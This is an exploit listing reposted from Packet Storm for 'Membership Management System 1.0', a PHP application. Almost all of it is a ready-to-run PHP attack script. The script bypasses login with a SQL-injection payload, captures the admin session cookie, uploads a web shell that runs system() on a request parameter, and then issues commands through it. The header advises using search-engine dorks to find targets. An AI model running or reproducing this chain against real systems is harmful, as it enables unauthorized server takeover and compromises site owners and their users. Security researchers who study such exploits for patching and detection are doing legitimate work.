Share
## https://sploitus.com/exploit?id=PACKETSTORM:181551
=============================================================================================================================================
| # Title : Membership Management System version 1.0 php code injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |
| # Vendor : https://codeastro.com/membership-management-system-in-php-with-source-code/ |
=============================================================================================================================================
poc :
[+] Dorking ฤฐn Google Or Other Search Enggine.
[+] This payload inject php code contains a back door.
[+] Line 20 Set your Target.
[+] save payload as poc.php
[+] usage from cmd : C:\www\test>php 1.php
[+] payload :
<?php
// Function to generate a random string of a given length
function randomGen($size = 8, $chars = 'abcdefghijklmnopqrstuvwxyz') {
return substr(str_shuffle(str_repeat($chars, ceil($size / strlen($chars)))), 1, $size);
}
// Generating a random web shell file
$shellFile = randomGen() . ".php";
// Creating a payload for the login
$payload = [
'email' => "test@mail.com' or 0=0 #", // Adjust based on the target
'password' => 'a',
'login' => ''
];
$session = curl_init();
// Target base URL (change this to your target IP or domain)
$urlBase = "http://127.0.0.1/Membership/";
// Login
$url = $urlBase . "index.php";
echo "=== Executing SQL Injection ===\n";
// Set cURL options for the POST request
curl_setopt($session, CURLOPT_URL, $url);
curl_setopt($session, CURLOPT_POST, 1);
curl_setopt($session, CURLOPT_POSTFIELDS, http_build_query($payload));
curl_setopt($session, CURLOPT_RETURNTRANSFER, true);
curl_setopt($session, CURLOPT_HEADER, true); // Include header in output
curl_setopt($session, CURLOPT_FOLLOWLOCATION, false);
curl_setopt($session, CURLOPT_VERBOSE, true); // For debugging
// Execute the login request
$response = curl_exec($session);
// Separate headers from body
$header_size = curl_getinfo($session, CURLINFO_HEADER_SIZE);
$headers = substr($response, 0, $header_size);
$body = substr($response, $header_size);
// Check if 'Set-Cookie' header is present in the headers
preg_match_all('/^Set-Cookie:\s*([^;]+)/mi', $headers, $matches);
$cookie = '';
if (isset($matches[1][0])) {
$cookie = $matches[1][0];
}
// Print headers for debugging
echo "=== Response Headers ===\n";
echo $headers;
if ($cookie) {
echo "=== Authenticated admin cookie: " . $cookie . " ===\n";
} else {
echo "Set-Cookie header not found in the response.\n";
exit();
}
// Prepare to upload shell
$url = $urlBase . "settings.php";
// Get user input for the command to execute
echo "Enter the command to execute: ";
$cmd_input = trim(fgets(STDIN));
// PHP code to execute the command received from the user
$php_code = "<?php if(isset(\$_REQUEST['cmd'])){\$cmd = \$_REQUEST['cmd']; system(\$cmd); die; }?>";
// Prepare the multipart/form-data
$boundary = '----WebKitFormBoundary' . bin2hex(random_bytes(16));
$body = "--$boundary\r\n";
$body .= 'Content-Disposition: form-data; name="systemName"' . "\r\n\r\n";
$body .= "Membership System\r\n";
$body .= "--$boundary\r\n";
$body .= 'Content-Disposition: form-data; name="currency"' . "\r\n\r\n";
$body .= "$\r\n";
$body .= "--$boundary\r\n";
$body .= 'Content-Disposition: form-data; name="logo"; filename="' . $shellFile . '"' . "\r\n";
$body .= 'Content-Type: application/x-php' . "\r\n\r\n";
$body .= $php_code . "\r\n";
$body .= "--$boundary\r\n";
$body .= 'Content-Disposition: form-data; name="updateSettings"' . "\r\n\r\n";
$body .= "\r\n";
$body .= "--$boundary--\r\n";
// Set cURL options for file upload
curl_setopt($session, CURLOPT_URL, $url);
curl_setopt($session, CURLOPT_POST, 1);
curl_setopt($session, CURLOPT_POSTFIELDS, $body);
curl_setopt($session, CURLOPT_HTTPHEADER, [
'Content-Type: multipart/form-data; boundary=' . $boundary,
'Cookie: ' . $cookie
]);
echo "=== Logging in and uploading shell " . $shellFile . " ===\n";
// Execute the upload request
$response = curl_exec($session);
// Close cURL session
curl_close($session);
// Curl the shell for testing
$requestUrl = $urlBase . "uploads/" . $shellFile . "?cmd=" . urlencode($cmd_input);
echo "=== Issuing the command: " . $requestUrl . " ===\n";
echo "=== CURL OUTPUT ===\n";
echo file_get_contents($requestUrl);
?>
[+]
Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================